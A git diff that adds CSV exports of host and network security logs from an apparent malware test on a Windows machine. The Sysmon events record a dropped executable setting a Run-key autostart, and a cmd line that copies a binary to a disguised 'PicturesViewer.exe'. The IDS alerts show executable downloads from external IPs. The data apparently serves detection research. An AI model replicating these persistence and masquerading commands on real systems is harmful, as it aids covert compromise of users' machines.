HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\wrzaxthjp\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Roaming\\Microsoft\\Eofgx\\ywpeoq.exe\""\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-26 09:37:32.291"",""processGuid"":""{df9fc3d3-e198-5ecc-0000-00109c992e00}"",""processId"":""3556"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\wrzaxthjp"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Roaming\\\\Microsoft\\\\Eofgx\\\\ywpeoq.exe\\\""""}}}","\""C:\\Users\\John Williams\\AppData\\Roaming\\Microsoft\\Eofgx\\ywpeoq.exe\""" +"May 28, 2020 @ 
09:55:35.893",12,"Sysmon - Suspicious Process - explorer.exe","""Process Create: +RuleName: +UtcTime: 2020-05-26 09:30:00.171 +ProcessGuid: {df9fc3d3-e198-5ecc-0000-00109c992e00} +ProcessId: 3556 +Image: C:\Windows\SysWOW64\explorer.exe +FileVersion: 10.0.18362.693 (WinBuild.160101.0800) +Description: Windows Explorer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: EXPLORER.EXE +CommandLine: C:\Windows\SysWOW64\explorer.exe +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300} +LogonId: 0x32D50 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962 +ParentProcessGuid: {df9fc3d3-e194-5ecc-0000-0010e5692e00} +ParentProcessId: 2040 +ParentImage: C:\Users\John Williams\AppData\Roaming\Microsoft\Eofgx\ywpeoq.exe +ParentCommandLine: ""C:\Users\John Williams\AppData\Roaming\Microsoft\Eofgx\ywpeoq.exe""""","C:\\Windows\\SysWOW64\\explorer.exe",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T09:30:00.216640900Z"",""eventRecordID"":""1524"",""processID"":""2176"",""threadID"":""3312"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-26 09:30:00.171\r\nProcessGuid: {df9fc3d3-e198-5ecc-0000-00109c992e00}\r\nProcessId: 3556\r\nImage: C:\\Windows\\SysWOW64\\explorer.exe\r\nFileVersion: 10.0.18362.693 (WinBuild.160101.0800)\r\nDescription: Windows Explorer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: EXPLORER.EXE\r\nCommandLine: C:\\Windows\\SysWOW64\\explorer.exe\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300}\r\nLogonId: 0x32D50\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962\r\nParentProcessGuid: {df9fc3d3-e194-5ecc-0000-0010e5692e00}\r\nParentProcessId: 2040\r\nParentImage: C:\\Users\\John Williams\\AppData\\Roaming\\Microsoft\\Eofgx\\ywpeoq.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\AppData\\Roaming\\Microsoft\\Eofgx\\ywpeoq.exe\""\""""},""eventdata"":{""utcTime"":""2020-05-26 09:30:00.171"",""processGuid"":""{df9fc3d3-e198-5ecc-0000-00109c992e00}"",""processId"":""3556"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""fileVersion"":""10.0.18362.693 (WinBuild.160101.0800)"",""description"":""Windows Explorer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""EXPLORER.EXE"",""commandLine"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-dfe2-5ecc-0000-0020502d0300}"",""logonId"":""0x32d50"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962"",""parentProcessGuid"":""{df9fc3d3-e194-5ecc-0000-0010e5692e00}"",""parentProcessId"":""2040"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Roaming\\\\Microsoft\\\\Eofgx\\\\ywpeoq.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Roaming\\\\Microsoft\\\\Eofgx\\\\ywpeoq.exe\\\""""}}}", +"May 
28, 2020 @ 09:55:32.252",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-26 09:29:56.664 +ProcessGuid: {df9fc3d3-e194-5ecc-0000-001087762e00} +ProcessId: 3572 +Image: C:\Windows\SysWOW64\PING.EXE +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: TCP/IP Ping Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: ping.exe +CommandLine: ping.exe -n 6 127.0.0.1 +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300} +LogonId: 0x32D50 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=36A1F0BBF757F52C9F051C91D11DE6AA,SHA256=09E7534F7703B4E067455F0D83A77EFA28A04C368381C5A0456282A57E801B04,IMPHASH=6C1FE20B3F9688A9263FFDF9FF417272 +ParentProcessGuid: {df9fc3d3-e194-5ecc-0000-0010d1732e00} +ParentProcessId: 6400 +ParentImage: C:\Windows\SysWOW64\cmd.exe +ParentCommandLine: ""C:\Windows\System32\cmd.exe"" /c ping.exe -n 6 127.0.0.1 & type ""C:\Windows\System32\calc.exe"" > ""C:\Users\JOHNWI~1\AppData\Local\Temp\PicturesViewer.exe""""","ping.exe -n 6 127.0.0.1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T09:29:56.666387700Z"",""eventRecordID"":""1520"",""processID"":""2176"",""threadID"":""3312"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-26 09:29:56.664\r\nProcessGuid: {df9fc3d3-e194-5ecc-0000-001087762e00}\r\nProcessId: 3572\r\nImage: C:\\Windows\\SysWOW64\\PING.EXE\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: TCP/IP Ping Command\r\nProduct: Microsoft® Windows® 
Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: ping.exe\r\nCommandLine: ping.exe -n 6 127.0.0.1 \r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300}\r\nLogonId: 0x32D50\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=36A1F0BBF757F52C9F051C91D11DE6AA,SHA256=09E7534F7703B4E067455F0D83A77EFA28A04C368381C5A0456282A57E801B04,IMPHASH=6C1FE20B3F9688A9263FFDF9FF417272\r\nParentProcessGuid: {df9fc3d3-e194-5ecc-0000-0010d1732e00}\r\nParentProcessId: 6400\r\nParentImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\cmd.exe\"" /c ping.exe -n 6 127.0.0.1 & type \""C:\\Windows\\System32\\calc.exe\"" > \""C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\PicturesViewer.exe\""\""""},""eventdata"":{""utcTime"":""2020-05-26 09:29:56.664"",""processGuid"":""{df9fc3d3-e194-5ecc-0000-001087762e00}"",""processId"":""3572"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\PING.EXE"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""TCP/IP Ping Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""ping.exe"",""commandLine"":""ping.exe -n 6 127.0.0.1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-dfe2-5ecc-0000-0020502d0300}"",""logonId"":""0x32d50"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=36A1F0BBF757F52C9F051C91D11DE6AA,SHA256=09E7534F7703B4E067455F0D83A77EFA28A04C368381C5A0456282A57E801B04,IMPHASH=6C1FE20B3F9688A9263FFDF9FF417272"",""parentProcessGuid"":""{df9fc3d3-e194-5ecc-0000-0010d1732e00}"",""parentProcessId"":""6400"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\cmd.exe\\\"" /c ping.exe -n 6 127.0.0.1 & type 
\\\""C:\\\\Windows\\\\System32\\\\calc.exe\\\"" > \\\""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\PicturesViewer.exe\\\""""}}}", diff --git a/data/MW_5_NIDS.csv b/data/MW_5_NIDS.csv new file mode 100644 index 0000000..84a2e68 --- /dev/null +++ b/data/MW_5_NIDS.csv 
@@ -0,0 +1,13 @@ +"@timestamp",message,"log.file.path" +"May 28, 2020 @ 09:57:10.035","05/28/2020-09:57:03.108879 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 74.125.100.167:80 -> 172.16.2.2:50182","/var/log/suricata/fast.log" +"May 28, 2020 @ 09:57:10.035","05/28/2020-09:57:03.108879 [**] [1:2014520:6] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 74.125.100.167:80 -> 172.16.2.2:50182","/var/log/suricata/fast.log" +"May 28, 2020 @ 09:57:00.068","05/28-09:56:58.919140 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 74.125.100.167:80 -> 172.16.2.2:50182","/var/log/snort/alert.fast" +"May 28, 2020 @ 09:57:00.068","05/28-09:56:58.919140 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 74.125.100.167:80 -> 172.16.2.2:50182","/var/log/snort/alert.fast" +"May 28, 2020 @ 09:54:25.010","05/28-09:54:16.334943 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 5.23.52.122:80 -> 172.16.2.2:50126","/var/log/snort/alert.fast" +"May 28, 2020 @ 09:54:25.010","05/28-09:54:18.723996 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 5.23.52.122:80 -> 172.16.2.2:50128","/var/log/snort/alert.fast" +"May 28, 2020 @ 09:54:25.010","05/28-09:54:18.723996 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 5.23.52.122:80 -> 172.16.2.2:50128","/var/log/snort/alert.fast" +"May 28, 2020 @ 09:54:25.009","05/28/2020-09:54:16.471258 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: 
Potential Corporate Privacy Violation] [Priority: 1] {TCP} 5.23.52.122:80 -> 172.16.2.2:50126","/var/log/suricata/fast.log" +"May 28, 2020 @ 09:54:25.009","05/28/2020-09:54:16.471258 [**] [1:2014520:6] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 5.23.52.122:80 -> 172.16.2.2:50126","/var/log/suricata/fast.log" +"May 28, 2020 @ 09:54:25.009","05/28/2020-09:54:18.952366 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 5.23.52.122:80 -> 172.16.2.2:50128","/var/log/suricata/fast.log" +"May 28, 2020 @ 09:54:25.009","05/28/2020-09:54:18.952366 [**] [1:2014520:6] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 5.23.52.122:80 -> 172.16.2.2:50128","/var/log/suricata/fast.log" +"May 28, 2020 @ 09:54:25.009","05/28-09:54:16.334943 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 5.23.52.122:80 -> 172.16.2.2:50126","/var/log/snort/alert.fast" diff --git a/data/MW_6_HIDS_3.csv b/data/MW_6_HIDS_3.csv new file mode 100644 index 0000000..542fd43 --- /dev/null +++ b/data/MW_6_HIDS_3.csv 
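Review bot: The `@timestamp` column in every row of this hunk is the collector's ingestion time, not the sensor's alert time — the Suricata rows stamped `09:57:10.035` carry `09:57:03.108879` inside `message`, and the Snort rows for the same flow carry `09:56:58.919140` in a different format that omits the year. Anyone correlating these rows with the HIDS exports should parse the sensor time out of `message` rather than rely on `@timestamp`, and a note to that effect belongs in the dataset's README. Each download is also alerted twice by each engine (SIDs 2018959 and 2014520 on the same `74.125.100.167:80 -> 172.16.2.2:50182` flow, once from `/var/log/snort/alert.fast` and once from `/var/log/suricata/fast.log`), so detection counts derived from this file should be de-duplicated per sensor and SID rather than summed. The differing rule revisions (`2014520:2` for Snort versus `2014520:6` for Suricata) suggest the two sensors ran different ruleset versions, which is worth recording alongside the data if that is the case.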
@@ -0,0 +1,161 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 28, 2020 @ 12:17:27.949",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '7b0e21ee99623454e8d06871f064ed98' +New md5sum is : '7fa7290c3b0e7b2d8ed5a092299db356' +Old sha1sum was: 'f63735bbc2e72216030f4e994b7c9785856a9170' +New sha1sum is : '27735fff26a4f9093576dfbd77d06599094d3497' +", +"May 28, 2020 @ 12:17:26.854",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: 'ca03a699ef4a8d5fc7dbf35d64e054e0' +New md5sum is : '451281856a95784f3f631c6ed2dfd3d2' +Old sha1sum was: '1b71ef2e669844e9269d00eb70279efaa6016d12' +New sha1sum is : 'ce278144ea52b95bdfabfb8c3a68a61d709530c4' +", +"May 28, 2020 @ 12:17:26.839",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '724cdf662876b7f16830bfbeb2ac9b3a' +New md5sum is : '8e9147c00e3845c0b79118bcdba05339' +Old sha1sum was: 'eb3a1f0df599d4e06740b3159f04bf6b12fbffc7' +New sha1sum is : '27fd277750d88f31b0a0405777373541ddaeabdf' +", +"May 28, 2020 @ 12:17:24.558",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. 
+Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +", +"May 28, 2020 @ 12:17:20.230",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '370914f65a755a1cbfcf0c873b11feaa' +New md5sum is : '1c729912f87f9abbd1574176fc5996f7' +Old sha1sum was: 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +New sha1sum is : '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +", +"May 28, 2020 @ 12:17:11.241",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '44a185f2e5e0fa09edbcbe3e598fe4da' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +", +"May 28, 2020 @ 12:17:01.136",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-28 12:16:53.927 +ProcessGuid: {df9fc3d3-aba5-5ecf-0000-00100a6f0b00} +ProcessId: 6556 +Image: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Uninstall 20.052.0311.0011 +Details: C:\Windows\system32\cmd.exe /q /c rmdir /s /q ""C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\20.052.0311.0011""""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Uninstall 
20.052.0311.0011","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:16:53.946652100Z"",""eventRecordID"":""2157"",""processID"":""2180"",""threadID"":""3120"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-28 12:16:53.927\r\nProcessGuid: {df9fc3d3-aba5-5ecf-0000-00100a6f0b00}\r\nProcessId: 6556\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Uninstall 20.052.0311.0011\r\nDetails: C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \""C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\20.052.0311.0011\""\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-28 12:16:53.927"",""processGuid"":""{df9fc3d3-aba5-5ecf-0000-00100a6f0b00}"",""processId"":""6556"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Uninstall 20.052.0311.0011"",""details"":""C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\20.052.0311.0011\\\""""}}}","C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \""C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\20.052.0311.0011\""" +"May 28, 2020 @ 12:17:01.133",10,"ATT&CK T1060: Autorun Keys Modification","""Registry 
value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-28 12:16:53.927 +ProcessGuid: {df9fc3d3-aba5-5ecf-0000-00100a6f0b00} +ProcessId: 6556 +Image: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Uninstall 20.052.0311.0011 +Details: C:\Windows\system32\cmd.exe /q /c rmdir /s /q ""C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\20.052.0311.0011""""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Uninstall 20.052.0311.0011","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:16:53.946388900Z"",""eventRecordID"":""2156"",""processID"":""2180"",""threadID"":""3120"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-28 12:16:53.927\r\nProcessGuid: {df9fc3d3-aba5-5ecf-0000-00100a6f0b00}\r\nProcessId: 6556\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Uninstall 20.052.0311.0011\r\nDetails: C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \""C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\20.052.0311.0011\""\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-28 12:16:53.927"",""processGuid"":""{df9fc3d3-aba5-5ecf-0000-00100a6f0b00}"",""processId"":""6556"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Uninstall 20.052.0311.0011"",""details"":""C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\20.052.0311.0011\\\""""}}}","C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \""C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\20.052.0311.0011\""" +"May 28, 2020 @ 12:17:01.082",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-28 12:16:53.911 +ProcessGuid: {df9fc3d3-aba5-5ecf-0000-00100a6f0b00} +ProcessId: 6556 +Image: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Uninstall 20.052.0311.0011\amd64 +Details: C:\Windows\system32\cmd.exe /q /c rmdir /s /q ""C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\20.052.0311.0011\amd64""""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Uninstall 20.052.0311.0011\\amd64","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:16:53.946142400Z"",""eventRecordID"":""2155"",""processID"":""2180"",""threadID"":""3120"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-28 12:16:53.911\r\nProcessGuid: 
{df9fc3d3-aba5-5ecf-0000-00100a6f0b00}\r\nProcessId: 6556\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Uninstall 20.052.0311.0011\\amd64\r\nDetails: C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \""C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\20.052.0311.0011\\amd64\""\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-28 12:16:53.911"",""processGuid"":""{df9fc3d3-aba5-5ecf-0000-00100a6f0b00}"",""processId"":""6556"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Uninstall 20.052.0311.0011\\\\amd64"",""details"":""C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\20.052.0311.0011\\\\amd64\\\""""}}}","C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \""C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\20.052.0311.0011\\amd64\""" +"May 28, 2020 @ 12:16:56.968",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-28 12:16:50.287 +ProcessGuid: {df9fc3d3-aba5-5ecf-0000-00100a6f0b00} +ProcessId: 6556 +Image: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary +Details: C:\Windows\system32\cmd.exe /q /c del /q ""C:\Users\John 
Williams\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe""""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Standalone Update Binary","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:16:50.303252000Z"",""eventRecordID"":""2113"",""processID"":""2180"",""threadID"":""3120"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-28 12:16:50.287\r\nProcessGuid: {df9fc3d3-aba5-5ecf-0000-00100a6f0b00}\r\nProcessId: 6556\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Standalone Update Binary\r\nDetails: C:\\Windows\\system32\\cmd.exe /q /c del /q \""C:\\Users\\John 